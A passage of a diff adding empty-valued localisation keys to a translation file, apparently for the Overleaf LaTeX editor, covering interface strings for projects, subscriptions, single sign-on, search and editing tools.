"no_other_projects_found": "", + "no_pdf_error_explanation": "", + "no_pdf_error_reason_no_content": "", + "no_pdf_error_reason_output_pdf_already_exists": "", + "no_pdf_error_reason_unrecoverable_error": "", + "no_pdf_error_title": "", + "no_preview_available": "", + "no_projects": "", + "no_resolved_comments": "", + "no_search_results": "", + "no_selection_select_file": "", + "no_symbols_found": "", + "no_thanks_cancel_now": "", + "normal": "", + "normally_x_price_per_month": "", + "normally_x_price_per_year": "", + "not_a_student": "", + "not_managed": "", + "not_now": "", + "notification_personal_and_group_subscriptions": "", + "notification_project_invite_accepted_message": "", + "notification_project_invite_message": "", + "number_of_users": "", + "numbered_list": "", + "oauth_orcid_description": "", + "of": "", + "off": "", + "official": "", + "ok": "", + "ok_continue_to_project": "", + "ok_join_project": "", + "on": "", + "on_free_plan_upgrade_to_access_features": "", + "one_step_away_from_professional_features": "", + "only_group_admin_or_managers_can_delete_your_account_1": "", + "only_group_admin_or_managers_can_delete_your_account_2": "", + "only_group_admin_or_managers_can_delete_your_account_3": "", + "only_group_admin_or_managers_can_delete_your_account_4": "", + "only_group_admin_or_managers_can_delete_your_account_5": "", + "only_importer_can_refresh": "", + "open_action_menu": "", + "open_advanced_reference_search": "", + "open_file": "", + "open_link": "", + "open_path": "", + "open_pdf_in_separate_tab": "", + "open_project": "", + "open_target": "", + "optional": "", + "or": "", + "organization_name": "", + "organize_projects": "", + "organize_tags": "", + "other": "", + "other_causes_of_compile_timeouts": "", + "other_logs_and_files": "", + "other_output_files": "", + "our_team_will_get_back_to_you_shortly": "", + "our_values": "", + "out_of_sync": "", + "out_of_sync_detail": "", + "output_file": "", + "overall_theme": "", + "overleaf": "", + "overleaf_history_system": "", + "overleaf_labs": "", + "overleaf_logo": "", + "overview": "", + "overwrite": "", + "overwriting_the_original_folder": "", + "owned_by_x": "", + "owner": "", + "page_current": "", + "pagination_navigation": "", + "papers_dynamic_sync_description": "", + "papers_groups_loading_error": "", + "papers_groups_relink": "", + "papers_integration": "", + "papers_is_premium": "", + "papers_reference_loading_error": "", + "papers_reference_loading_error_expired": "", + "papers_reference_loading_error_forbidden": "", + "papers_sync_description": "", + "papers_upgrade_prompt_content": "", + "papers_upgrade_prompt_title": "", + "paragraph_styles": "", + "partial_outline_warning": "", + "password": "", + "password_managed_externally": "", + "password_was_detected_on_a_public_list_of_known_compromised_passwords": "", + "paste_options": "", + "paste_with_formatting": "", + "paste_without_formatting": "", + "pause_subscription": "", + "pause_subscription_for": "", + "pay_now": "", + "payment_provider_unreachable_error": "", + "payment_summary": "", + "pdf_compile_in_progress_error": "", + "pdf_compile_rate_limit_hit": "", + "pdf_compile_try_again": "", + "pdf_couldnt_compile": "", + "pdf_in_separate_tab": "", + "pdf_only": "", + "pdf_only_hide_editor": "", + "pdf_preview": "", + "pdf_preview_error": "", + "pdf_rendering_error": "", + "pdf_unavailable_for_download": "", + "pdf_viewer": "", + "pdf_viewer_error": "", + "pending_additional_licenses": "", + "pending_addon_cancellation": "", + "pending_invite": "", + "per_license": "", + "per_month": "", + "percent_is_the_percentage_of_the_line_width": "", + "permanently_disables_the_preview": "", + "personal_library": "", + "pick_up_where_you_left_off": "", + "plan": "", + "plan_tooltip": "", + "please_ask_the_project_owner_to_upgrade_more_collaborators": "", + "please_ask_the_project_owner_to_upgrade_to_track_changes": "", + "please_change_primary_to_remove": "", + "please_check_your_inbox_to_confirm": "", + "please_compile_pdf_before_download": "", + "please_compile_pdf_before_word_count": "", + "please_confirm_primary_email": "", + "please_confirm_secondary_email": "", + "please_confirm_your_email_before_making_it_default": "", + "please_contact_support_to_makes_change_to_your_plan": "", + "please_enter_confirmation_code": "", + "please_get_in_touch": "", + "please_link_before_making_primary": "", + "please_provide_a_message": "", + "please_provide_a_subject": "", + "please_provide_a_valid_email_address": "", + "please_reconfirm_institutional_email": "", + "please_reconfirm_your_affiliation_before_making_this_primary": "", + "please_refresh": "", + "please_select": "", + "please_select_a_file": "", + "please_select_a_project": "", + "please_select_an_output_file": "", + "please_set_main_file": "", + "please_wait": "", + "plus_additional_collaborators_document_history_track_changes_and_more": "", + "plus_more": "", + "plus_x_additional_licenses_for_a_total_of_y_licenses": "", + "postal_code": "", + "premium": "", + "premium_feature": "", + "premium_features": "", + "premium_plan_label": "", + "presentation_mode": "", + "press_and_awards": "", + "previous_page": "", + "price": "", + "primarily_work_study_question": "", + "primarily_work_study_question_company": "", + "primarily_work_study_question_government": "", + "primarily_work_study_question_nonprofit_ngo": "", + "primarily_work_study_question_other": "", + "primarily_work_study_question_university_school": "", + "primary_certificate": "", + "priority_support": "", + "privacy_and_terms": "", + "private": "", + "problem_talking_to_publishing_service": "", + "problem_with_subscription_contact_us": "", + "proceed_to_paypal": "", + "proceeding_to_paypal_takes_you_to_the_paypal_site_to_pay": "", + "processing": "", + "processing_uppercase": "", + "professional": "", + "progress_bar_percentage": "", + "project_approaching_file_limit": "", + "project_failed_to_compile": "", + "project_figure_modal": "", + "project_files": "", + "project_flagged_too_many_compiles": "", + "project_has_too_many_files": "", + "project_last_published_at": "", + "project_layout_sharing_submission": "", + "project_linked_to": "", + "project_name": "", + "project_not_linked_to_github": "", + "project_ownership_transfer_confirmation_1": "", + "project_ownership_transfer_confirmation_2": "", + "project_renamed_or_deleted": "", + "project_renamed_or_deleted_detail": "", + "project_search_file_count": "", + "project_search_file_count_plural": "", + "project_search_result_count": "", + "project_search_result_count_plural": "", + "project_synchronisation": "", + "project_timed_out_enable_stop_on_first_error": "", + "project_timed_out_fatal_error": "", + "project_timed_out_intro": "", + "project_timed_out_learn_more": "", + "project_timed_out_optimize_images": "", + "project_title_options": "", + "project_too_large": "", + "project_too_large_please_reduce": "", + "project_too_much_editable_text": "", + "project_url": "", + "projects": "", + "projects_count": "", + "projects_list": "", + "provide_details_of_your_sso_configuration": "", + "public": "", + "publish": "", + "publish_as_template": "", + "publisher_account": "", + "publishing": "", + "pull_github_changes_into_sharelatex": "", + "push_sharelatex_changes_to_github": "", + "push_to_github_pull_to_overleaf": "", + "quoted_text": "", + "raw_logs": "", + "raw_logs_description": "", + "react_history_tutorial_content": "", + "react_history_tutorial_title": "", + "reactivate_subscription": "", + "read_lines_from_path": "", + "read_more": "", + "read_more_about_free_compile_timeouts_servers": "", + "read_only_dropbox_sync_message": "", + "read_only_token": "", + "read_write_token": "", + "ready_to_join_x": "", + "ready_to_join_x_in_group_y": "", + "ready_to_set_up": "", + "realtime_track_changes": "", + "reasons_for_compile_timeouts": "", + "reauthorize_github_account": "", + "recaptcha_conditions": "", + "recent_commits_in_github": "", + "recommended": "", + "recompile": "", + "recompile_from_scratch": "", + "recompile_pdf": "", + "reconfirm_secondary_email": "", + "reconnect": "", + "reconnecting": "", + "reconnecting_in_x_secs": "", + "recurly_email_update_needed": "", + "recurly_email_updated": "", + "redirect_to_editor": "", + "redirect_url": "", + "redo": "", + "reduce_costs_group_licenses": "", + "reference_error_relink_hint": "", + "reference_manager_searched_groups": "", + "reference_managers": "", + "reference_search": "", + "reference_search_setting": "", + "reference_search_settings": "", + "reference_search_style": "", + "reference_sync": "", + "references_from_these_libraries_will_be_included_in_your_reference_search_results": "", + "refresh": "", + "refresh_page_after_linking_dropbox": "", + "refresh_page_after_starting_free_trial": "", + "refreshing": "", + "regards": "", + "reject_change": "", + "reject_selected_changes": "", + "relink_your_account": "", + "reload_editor": "", + "remind_before_trial_ends": "", + "remote_service_error": "", + "remove": "", + "remove_access": "", + "remove_email_address": "", + "remove_from_group": "", + "remove_link": "", + "remove_manager": "", + "remove_or_replace_figure": "", + "remove_secondary_email_addresses": "", + "remove_sso_login_option": "", + "remove_tag": "", + "removed_from_project": "", + "removing": "", + "rename": "", + "rename_project": "", + "renews_on": "", + "reopen": "", + "reopen_comment_error_message": "", + "reopen_comment_error_title": "", + "replace_figure": "", + "replace_from_another_project": "", + "replace_from_computer": "", + "replace_from_project_files": "", + "replace_from_url": "", + "reply": "", + "repository_name": "", + "repository_visibility": "", + "republish": "", + "resend": "", + "resend_confirmation_code": "", + "resend_confirmation_email": "", + "resend_email": "", + "resend_group_invite": "", + "resend_link_sso": "", + "resend_managed_user_invite": "", + "resending_confirmation_code": "", + "resending_confirmation_email": "", + "resize": "", + "resolve_comment": "", + "resolve_comment_error_message": "", + "resolve_comment_error_title": "", + "resolved_comments": "", + "restore": "", + "restore_file": "", + "restore_file_confirmation_message": "", + "restore_file_confirmation_title": "", + "restore_file_error_message": "", + "restore_file_error_title": "", + "restore_file_version": "", + "restore_project_to_this_version": "", + "restore_this_version": "", + "resync_completed": "", + "resync_message": "", + "resync_project_history": "", + "retry_test": "", + "reverse_x_sort_order": "", + "revert_pending_plan_change": "", + "review": "", + "review_panel": "", + "review_panel_and_error_logs_moved_to_the_left": "", + "review_your_peers_work": "", + "reviewer": "", + "reviewer_dropbox_sync_message": "", + "reviewing": "", + "revoke": "", + "revoke_invite": "", + "right": "", + "role": "", + "saml_auth_error": "", + "saml_identity_exists_error": "", + "saml_invalid_signature_error": "", + "saml_login_disabled_error": "", + "saml_login_failure": "", + "saml_login_identity_mismatch_error": "", + "saml_login_identity_not_found_error": "", + "saml_metadata": "", + "saml_missing_signature_error": "", + "saml_response": "", + "save": "", + "save_20_percent_when_you_switch_to_annual": "", + "save_or_cancel-cancel": "", + "save_or_cancel-or": "", + "save_or_cancel-save": "", + "save_x_or_more": "", + "saving": "", + "saving_notification_with_seconds": "", + "search": "", + "search_all_project_files": "", + "search_bib_files": "", + "search_by_author_journal_title_and_more_link_to_zotero_mendeley_papers": "", + "search_by_citekey_author_year_title": "", + "search_command_find": "", + "search_command_replace": "", + "search_in_all_projects": "", + "search_in_archived_projects": "", + "search_in_shared_projects": "", + "search_in_trashed_projects": "", + "search_in_your_projects": "", + "search_match_case": "", + "search_next": "", + "search_only_the_bib_files_in_your_project_only_by_citekeys": "", + "search_previous": "", + "search_project": "", + "search_projects": "", + "search_references": "", + "search_regexp": "", + "search_replace": "", + "search_replace_all": "", + "search_replace_with": "", + "search_search_for": "", + "search_this_file": "", + "search_whole_word": "", + "search_within_selection": "", + "searched_path_for_lines_containing": "", + "security": "", + "see_changes_in_your_documents_live": "", + "see_suggestions_from_collaborators": "", + "select_a_column_or_a_merged_cell_to_align": "", + "select_a_column_to_adjust_column_width": "", + "select_a_file": "", + "select_a_file_figure_modal": "", + "select_a_group_optional": "", + "select_a_language": "", + "select_a_new_owner_for_projects": "", + "select_a_payment_method": "", + "select_a_project": "", + "select_a_project_figure_modal": "", + "select_a_row_or_a_column_to_delete": "", + "select_access_level": "", + "select_access_levels": "", + "select_all": "", + "select_all_projects": "", + "select_an_output_file": "", + "select_an_output_file_figure_modal": "", + "select_bib_file": "", + "select_cells_in_a_single_row_to_merge": "", + "select_color": "", + "select_folder_from_project": "", + "select_from_output_files": "", + "select_from_project_files": "", + "select_from_source_files": "", + "select_from_your_computer": "", + "select_github_repository": "", + "select_image_from_project_files": "", + "select_project": "", + "select_projects": "", + "select_size": "", + "select_tag": "", + "select_user": "", + "selected": "", + "selection_deleted": "", + "send_first_message": "", + "send_message": "", + "send_request": "", + "sending": "", + "sent": "", + "server_error": "", + "server_pro_license_entitlement_line_1": "", + "server_pro_license_entitlement_line_2": "", + "server_pro_license_entitlement_line_3": "", + "session_created_at": "", + "session_error": "", + "session_expired_redirecting_to_login": "", + "sessions": "", + "set_color": "", + "set_column_width": "", + "set_up_single_sign_on": "", + "set_up_sso": "", + "settings": "", + "setup_another_account_under_a_personal_email_address": "", + "share": "", + "share_project": "", + "shared_with_you": "", + "sharelatex_beta_program": "", + "shortcut_to_open_advanced_reference_search": "", + "show_all_projects": "", + "show_document_preamble": "", + "show_equation_preview": "", + "show_file_tree": "", + "show_hotkeys": "", + "show_in_code": "", + "show_in_pdf": "", + "show_less": "", + "show_live_equation_previews_while_typing": "", + "show_local_file_contents": "", + "show_more": "", + "show_outline": "", + "show_version_history": "", + "show_x_more_projects": "", + "showing_1_result": "", + "showing_1_result_of_total": "", + "showing_x_out_of_n_projects": "", + "showing_x_results": "", + "showing_x_results_of_total": "", + "sign_up": "", + "simple_search_mode": "", + "single_sign_on_sso": "", + "skip": "", + "something_not_right": "", + "something_went_wrong": "", + "something_went_wrong_canceling_your_subscription": "", + "something_went_wrong_loading_pdf_viewer": "", + "something_went_wrong_processing_the_request": "", + "something_went_wrong_rendering_pdf": "", + "something_went_wrong_rendering_pdf_expected": "", + "something_went_wrong_server": "", + "somthing_went_wrong_compiling": "", + "sorry_it_looks_like_that_didnt_work_this_time": "", + "sorry_there_are_no_experiments": "", + "sorry_there_was_an_issue_adding_x_users_to_your_subscription": "", + "sorry_there_was_an_issue_upgrading_your_subscription": "", + "sorry_you_can_only_change_to_group_from_trial_via_support": "", + "sorry_your_table_cant_be_displayed_at_the_moment": "", + "sort_by": "", + "sort_by_x": "", + "sort_projects": "", + "source": "", + "spell_check": "", + "spellcheck": "", + "spellcheck_language": "", + "split_view": "", + "sso": "", + "sso_active": "", + "sso_already_setup_good_to_go": "", + "sso_config_deleted": "", + "sso_config_prop_help_certificate": "", + "sso_config_prop_help_first_name": "", + "sso_config_prop_help_last_name": "", + "sso_config_prop_help_redirect_url": "", + "sso_config_prop_help_user_id": "", + "sso_configuration": "", + "sso_configuration_not_finalized": "", + "sso_configuration_saved": "", + "sso_disabled_by_group_admin": "", + "sso_error_audience_mismatch": "", + "sso_error_idp_error": "", + "sso_error_invalid_external_user_id": "", + "sso_error_invalid_signature": "", + "sso_error_missing_external_user_id": "", + "sso_error_missing_firstname_attribute": "", + "sso_error_missing_lastname_attribute": "", + "sso_error_missing_signature": "", + "sso_error_response_already_processed": "", + "sso_explanation": "", + "sso_here_is_the_data_we_received": "", + "sso_is_disabled": "", + "sso_is_disabled_explanation_1": "", + "sso_is_disabled_explanation_2": "", + "sso_is_enabled": "", + "sso_is_enabled_explanation_1": "", + "sso_is_enabled_explanation_1_sso_only": "", + "sso_is_enabled_explanation_2": "", + "sso_link_account_with_idp": "", + "sso_link_error": "", + "sso_link_invite_has_been_sent_to_email": "", + "sso_logs": "", + "sso_not_active": "", + "sso_reauth_request": "", + "sso_test_interstitial_info_1": "", + "sso_test_interstitial_info_2": "", + "sso_test_interstitial_title": "", + "sso_test_result_error_message": "", + "sso_user_explanation_enabled_with_admin_email": "", + "sso_user_explanation_enabled_with_group_name": "", + "sso_user_explanation_ready_with_admin_email": "", + "sso_user_explanation_ready_with_group_name": "", + "standard": "", + "start_a_free_trial": "", + "start_by_adding_your_email": "", + "start_by_fixing_the_first_error_in_your_doc": "", + "start_free_trial": "", + "start_free_trial_without_exclamation": "", + "start_the_conversation_by_saying_hello_or_sharing_an_update": "", + "start_typing_find_your_company": "", + "start_typing_find_your_organization": "", + "start_typing_find_your_university": "", + "stop_compile": "", + "stop_on_first_error": "", + "stop_on_first_error_enabled_description": "", + "stop_on_first_error_enabled_title": "", + "stop_on_validation_error": "", + "store_your_work": "", + "stretch_width_to_text": "", + "student": "", + "student_disclaimer": "", + "subject": "", + "subject_area": "", + "subject_to_additional_vat": "", + "submit_title": "", + "subscribe": "", + "subscribe_to_find_the_symbols_you_need_faster": "", + "subscribe_to_plan": "", + "subscription": "", + "subscription_admins_cannot_be_deleted": "", + "subscription_canceled": "", + "subscription_canceled_and_terminate_on_x": "", + "subscription_will_remain_active_until_end_of_billing_period_x": "", + "subscription_will_remain_active_until_end_of_trial_period_x": "", + "success_sso_set_up": "", + "suggest_a_different_fix": "", + "suggest_fix": "", + "suggested": "", + "suggested_fix_for_error_in_path": "", + "suggestion_applied": "", + "suggests_code_completions_while_typing": "", + "support_for_your_browser_is_ending_soon": "", + "supports_up_to_x_licenses": "", + "sure_you_want_to_cancel_plan_change": "", + "sure_you_want_to_change_plan": "", + "sure_you_want_to_delete": "", + "sure_you_want_to_leave_group": "", + "switch_back_to_monthly_pay_20_more": "", + "switch_compile_mode_for_faster_draft_compilation": "", + "switch_to_editor": "", + "switch_to_new_editor": "", + "switch_to_old_editor": "", + "switch_to_pdf": "", + "switch_to_standard_plan": "", + "symbol": "", + "symbol_palette": "", + "sync": "", + "sync_dropbox_github": "", + "sync_project_to_github_explanation": "", + "sync_to_dropbox": "", + "sync_to_github": "", + "synctex_failed": "", + "syntax_validation": "", + "tab_connecting": "", + "tab_no_longer_connected": "", + "table": "", + "table_generator": "", + "tag_color": "", + "tag_name_cannot_exceed_characters": "", + "tag_name_is_already_used": "", + "tags": "", + "take_short_survey": "", + "take_survey": "", + "tc_everyone": "", + "tc_guests": "", + "tell_the_project_owner_and_ask_them_to_upgrade": "", + "template": "", + "template_description": "", + "template_title_taken_from_project_title": "", + "templates": "", + "temporarily_hides_the_preview": "", + "terminated": "", + "test": "", + "test_configuration": "", + "test_configuration_successful": "", + "tex_live_version": "", + "texgpt": "", + "thank_you_exclamation": "", + "thank_you_for_your_feedback": "", + "thanks_for_being_part_of_this_labs_experiment_your_feedback_will_help_us_make_the_new_editor_the_best_yet": "", + "thanks_for_confirming_your_email_address": "", + "thanks_for_getting_in_touch": "", + "thanks_for_subscribing": "", + "thanks_for_subscribing_to_plan_with_add_on": "", + "thanks_for_subscribing_to_the_add_on": "", + "thanks_for_subscribing_you_help_sl": "", + "thanks_settings_updated": "", + "the_add_on_will_remain_active_until": "", + "the_code_editor_color_scheme": "", + "the_document_environment_contains_no_content": "", + "the_following_files_already_exist_in_this_project": "", + "the_following_files_and_folders_already_exist_in_this_project": "", + "the_following_folder_already_exists_in_this_project": "", + "the_following_folder_already_exists_in_this_project_plural": "", + "the_latex_engine_used_for_compiling": "", + "the_new_overleaf_editor": "", + "the_next_payment_will_be_collected_on": "", + "the_original_text_has_changed": "", + "the_overleaf_color_scheme": "", + "the_primary_file_for_compiling_your_project": "", + "the_target_folder_could_not_be_found": "", + "the_version_of_tex_live_used_for_compiling": "", + "the_width_you_choose_here_is_based_on_the_width_of_the_text_in_your_document": "", + "their_projects_will_be_transferred_to_another_user": "", + "then_x_price_per_month": "", + "then_x_price_per_year": "", + "there_are_lots_of_options_to_edit_and_customize_your_figures": "", + "there_is_an_unrecoverable_latex_error": "", + "there_was_a_problem_restoring_the_project_please_try_again_in_a_few_moments_or_contact_us": "", + "they_lose_access_to_account": "", + "this_action_cannot_be_reversed": "", + "this_action_cannot_be_undone": "", + "this_address_will_be_shown_on_the_invoice": "", + "this_could_be_because_we_cant_support_some_elements_of_the_table": "", + "this_experiment_isnt_accepting_new_participants": "", + "this_field_is_required": "", + "this_grants_access_to_features_2": "", + "this_is_a_labs_experiment_for_the_new_overleaf_editor_some_features_are_still_in_progress": "", + "this_is_a_new_feature": "", + "this_is_the_file_that_references_pulled_from_your_reference_manager_will_be_added_to": "", + "this_project_already_has_maximum_collaborators": "", + "this_project_contains_a_file_called_output": "", + "this_project_exceeded_collaborator_limit": "", + "this_project_exceeded_compile_timeout_limit_on_free_plan": "", + "this_project_has_more_than_max_collabs": "", + "this_project_is_public": "", + "this_project_is_public_read_only": "", + "this_project_need_more_time_to_compile": "", + "this_project_will_appear_in_your_dropbox_folder_at": "", + "this_tool_helps_you_insert_figures": "", + "this_tool_helps_you_insert_simple_tables_into_your_project_without_writing_latex_code_give_feedback": "", + "this_total_reflects_the_amount_due_until": "", + "this_was_helpful": "", + "this_wasnt_helpful": "", + "this_will_remove_primary_email": "", + "timedout": "", + "tip": "", + "title": "", + "to_add_email_accounts_need_to_be_linked_2": "", + "to_add_more_collaborators": "", + "to_change_access_permissions": "", + "to_confirm_transfer_enter_email_address": "", + "to_confirm_unlink_all_users_enter_email": "", + "to_continue_using_upgrade_or_change_your_browser": "", + "to_delete_your_writefull_account": "", + "to_fix_this_you_can": "", + "to_fix_this_you_can_ask_the_github_repository_owner": "", + "to_insert_or_move_a_caption_make_sure_tabular_is_directly_within_table": "", + "to_keep_edit_access": "", + "to_modify_your_subscription_go_to": "", + "to_pull_results_directly_from_your_reference_manager_enable_one_of_the_available_reference_manager_integrations": "", + "to_use_text_wrapping_in_your_table_make_sure_you_include_the_array_package": "", + "toggle_compile_options_menu": "", + "toggle_group": "", + "toggle_personal_library": "", + "toggle_unknown_group": "", + "token": "", + "token_access_failure": "", + "token_limit_reached": "", + "token_read_only": "", + "token_read_write": "", + "too_many_attempts": "", + "too_many_comments_or_tracked_changes": "", + "too_many_comments_or_tracked_changes_detail": "", + "too_many_confirm_code_resend_attempts": "", + "too_many_confirm_code_verification_attempts": "", + "too_many_files_uploaded_throttled_short_period": "", + "too_many_requests": "", + "too_many_search_results": "", + "too_recently_compiled": "", + "took_a_while": "", + "toolbar_bullet_list": "", + "toolbar_choose_section_heading_level": "", + "toolbar_code_visual_editor_switch": "", + "toolbar_decrease_indent": "", + "toolbar_editor": "", + "toolbar_format_bold": "", + "toolbar_format_italic": "", + "toolbar_generate_math": "", + "toolbar_generate_table": "", + "toolbar_increase_indent": "", + "toolbar_insert_citation": "", + "toolbar_insert_cross_reference": "", + "toolbar_insert_display_math": "", + "toolbar_insert_figure": "", + "toolbar_insert_inline_math": "", + "toolbar_insert_link": "", + "toolbar_insert_math": "", + "toolbar_insert_math_and_symbols": "", + "toolbar_insert_math_lowercase": "", + "toolbar_insert_misc": "", + "toolbar_insert_table": "", + "toolbar_list_indentation": "", + "toolbar_numbered_list": "", + "toolbar_redo": "", + "toolbar_selected_projects": "", + "toolbar_selected_projects_management_actions": "", + "toolbar_selected_projects_remove": "", + "toolbar_selected_projects_restore": "", + "toolbar_table_insert_size_table": "", + "toolbar_table_insert_table_lowercase": "", + "toolbar_text_formatting": "", + "toolbar_text_style": "", + "toolbar_toggle_symbol_palette": "", + "toolbar_undo": "", + "toolbar_undo_redo_actions": "", + "tools": "", + "tooltip_hide_filetree": "", + "tooltip_hide_panel": "", + "tooltip_hide_pdf": "", + "tooltip_show_filetree": "", + "tooltip_show_panel": "", + "tooltip_show_pdf": "", + "total_due_today": "", + "total_per_month": "", + "total_per_year": "", + "total_today": "", + "total_with_subtotal_and_tax": "", + "total_words": "", + "track_any_change_in_real_time": "", + "track_changes": "", + "track_changes_for_everyone": "", + "track_changes_for_guests": "", + "track_changes_for_x": "", + "track_changes_is_off": "", + "track_changes_is_on": "", + "tracked_change_added": "", + "tracked_change_deleted": "", + "transfer_management_of_your_account": "", + "transfer_management_of_your_account_to_x": "", + "transfer_management_resolve_following_issues": "", + "transfer_this_users_projects": "", + "transfer_this_users_projects_description": "", + "transferring": "", + "trash": "", + "trash_projects": "", + "trashed": "", + "trashed_projects": "", + "trashing_projects_wont_affect_collaborators": "", + "trial_last_day": "", + "trial_remaining_days": "", + "tried_to_log_in_with_email": "", + "tried_to_register_with_email": "", + "troubleshooting_tip": "", + "try_again": "", + "try_for_free": "", + "try_it_for_free": "", + "try_now": "", + "try_papers_for_free": "", + "try_premium_for_free": "", + "try_recompile_project_or_troubleshoot": "", + "try_relinking_provider": "", + "try_the_new_editor": "", + "try_to_compile_despite_errors": "", + "turn_off": "", + "turn_off_link_sharing": "", + "turn_on": "", + "turn_on_link_sharing": "", + "tutorials": "", + "unarchive": "", + "uncategorized": "", + "uncategorized_projects": "", + "unconfirmed": "", + "undelete": "", + "understanding_labels": "", + "undo": "", + "unfold_line": "", + "unique_identifier_attribute": "", + "university": "", + "university_school": "", + "unknown": "", + "unknown_group": "", + "unlimited_collaborators_per_project": "", + "unlimited_collabs": "", + "unlimited_document_history": "", + "unlimited_projects": "", + "unlink": "", + "unlink_all_users": "", + "unlink_all_users_explanation": "", + "unlink_dropbox_folder": "", + "unlink_dropbox_warning": "", + "unlink_github_repository": "", + "unlink_github_warning": "", + "unlink_linked_accounts": "", + "unlink_linked_google_account": "", + "unlink_provider_account_title": "", + "unlink_provider_account_warning": "", + "unlink_reference": "", + "unlink_the_project_from_the_current_github_repo": "", + "unlink_user": "", + "unlink_user_explanation": "", + "unlink_users": "", + "unlink_warning_reference": "", + "unlinking": "", + "unmerge_cells": "", + "unpause_subscription": "", + "unpublish": "", + "unpublishing": "", + "unsubscribe": "", + "until_then_you_can_still": "", + "untrash": "", + "update": "", + "update_account_info": "", + "update_dropbox_settings": "", + "update_your_billing_details": "", + "updates_to_project_sharing": "", + "updating": "", + "upgrade": "", + "upgrade_cc_btn": "", + "upgrade_for_12x_more_compile_time": "", + "upgrade_my_plan": "", + "upgrade_now": "", + "upgrade_plan": "", + "upgrade_summary": "", + "upgrade_to_add_more_collaborators_and_access_collaboration_features": "", + "upgrade_to_get_feature": "", + "upgrade_to_review": "", + "upgrade_to_track_changes": "", + "upgrade_to_unlock_more_time": "", + "upgrade_your_subscription": "", + "upload": "", + "upload_file": "", + "upload_from_computer": "", + "upload_project": "", + "upload_zipped_project": "", + "url_to_fetch_the_file_from": "", + "us_gov_banner_fedramp": "", + "us_gov_banner_government_purchasing": "", + "us_gov_banner_small_business_reseller": "", + "usage_metrics": "", + "use_a_different_password": "", + "use_saml_metadata_to_configure_sso_with_idp": "", + "use_your_own_machine": "", + "used_latex_before": "", + "used_latex_response_never": "", + "used_latex_response_occasionally": "", + "used_latex_response_often": "", + "used_when_referring_to_the_figure_elsewhere_in_the_document": "", + "user_deletion_error": "", + "user_deletion_password_reset_tip": "", + "user_first_name_attribute": "", + "user_last_name_attribute": "", + "user_sessions": "", + "using_latex": "", + "using_premium_features": "", + "using_the_overleaf_editor": "", + "using_writefull": "", + "valid": "", + "valid_sso_configuration": "", + "validation_issue_entry_description": "", + "value_must_be_a_number": "", + "value_must_be_a_whole_number": "", + "value_must_be_at_least_x": "", + "vat": "", + "vat_number": "", + "verify_email_address_before_enabling_managed_users": "", + "view": "", + "view_all": "", + "view_billing_details": "", + "view_code": "", + "view_configuration": "", + "view_group_members": "", + "view_hub": "", + "view_hub_subtext": "", + "view_in_template_gallery": "", + "view_invitation": "", + "view_invoices": "", + "view_labs_experiments": "", + "view_less": "", + "view_logs": "", + "view_metrics": "", + "view_metrics_commons_subtext": "", + "view_metrics_group_subtext": "", + "view_more": "", + "view_only_access": "", + "view_only_downgraded": "", + "view_only_reviewer_downgraded": "", + "view_options": "", + "view_pdf": "", + "view_your_invoices": "", + "viewer": "", + "viewing": "", + "viewing_x": "", + "visual_editor": "", + "visual_editor_is_only_available_for_tex_files": "", + "want_change_to_apply_before_plan_end": "", + "we_are_unable_to_generate_the_pdf_at_this_time": "", + "we_are_unable_to_opt_you_into_this_experiment": "", + "we_cant_find_any_sections_or_subsections_in_this_file": "", + "we_do_not_share_personal_information": "", + "we_got_your_request": "", + "we_logged_you_in": "", + "we_sent_code": "", + "we_sent_new_code": "", + "we_will_charge_you_now_for_the_cost_of_your_additional_licenses_based_on_remaining_months": "", + "we_will_charge_you_now_for_your_new_plan_based_on_the_remaining_months_of_your_current_subscription": "", + "we_will_use_your_existing_payment_method": "", + "webinars": "", + "website_status": "", + "wed_love_you_to_stay": "", + "welcome_to_sl": "", + "well_be_here_when_youre_ready": "", + "were_making_some_changes_to_project_sharing_this_means_you_will_be_visible": "", + "were_performing_maintenance": "", + "were_redesigning_our_editor_to_make_it_easier_to_use": "", + "weve_recently_reduced_the_compile_timeout_limit_which_may_have_affected_this_project": "", + "weve_recently_reduced_the_compile_timeout_limit_which_may_have_affected_your_project": "", + "what_do_you_need_help_with": "", + "what_does_this_mean": "", + "what_does_this_mean_for_you": "", + "what_happens_when_sso_is_enabled": "", + "what_should_we_call_you": "", + "whats_new": "", + "whats_next": "", + "when_you_tick_the_include_caption_box": "", + "why_latex": "", + "why_might_this_happen": "", + "why_not_pause_instead": "", + "wide": "", + "will_lose_edit_access_on_date": "", + "with_premium_subscription_you_also_get": "", + "word_count": "", + "work_in_vim_or_emacs_emulation_mode": "", + "work_offline": "", + "work_offline_pull_to_overleaf": "", + "work_with_non_overleaf_users": "", + "work_with_other_github_users": "", + "write_faster_smarter_with_overleaf_and_writefull_ai_tools": "", + "writefull": "", + "writefull_loading_error_body": "", + "writefull_loading_error_title": "", + "x_changes_in": "", + "x_changes_in_plural": "", + "x_libraries_accessed_in_this_project": "", + "x_price_for_first_month": "", + "x_price_for_first_year": "", + "x_price_for_y_months": "", + "x_price_per_month": "", + "x_price_per_user": "", + "x_price_per_year": "", + "year": "", + "yes_move_me_to_personal_plan": "", + "you": "", + "you_already_have_a_subscription": "", + "you_are_a_manager_and_member_of_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_are_a_manager_and_member_of_x_plan_as_member_of_group_subscription_y_administered_by_z_you": "", + "you_are_a_manager_of_commons_at_institution_x": "", + "you_are_a_manager_of_publisher_x": "", + "you_are_a_manager_of_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_are_a_manager_of_x_plan_as_member_of_group_subscription_y_administered_by_z_you": "", + "you_are_now_saving_20_percent": "", + "you_are_on_a_paid_plan_contact_support_to_find_out_more": "", + "you_are_on_x_plan_as_a_confirmed_member_of_institution_y": "", + "you_are_on_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_can_also_choose_to_view_anonymously_or_leave_the_project": "", + "you_can_buy_this_plan_but_not_as_a_trial": "", + "you_can_leave_the_experiment_from_your_account_settings_at_any_time": "", + "you_can_manage_your_reference_manager_integrations_from_your_account_settings_page": "", + "you_can_now_enable_sso": "", + "you_can_now_log_in_sso": "", + "you_can_now_sync_your_papers_library_directly_with_your_overleaf_projects": "", + "you_can_request_a_maximum_of_limit_fixes_per_day": "", + "you_can_select_or_invite_collaborator": "", + "you_can_select_or_invite_collaborator_plural": "", + "you_can_still_use_your_premium_features": "", + "you_cant_add_or_change_password_due_to_sso": "", + "you_cant_join_this_group_subscription": "", + "you_dont_have_any_add_ons_on_your_account": "", + "you_dont_have_any_repositories": "", + "you_have_0_free_suggestions_left": "", + "you_have_1_free_suggestion_left": "", + 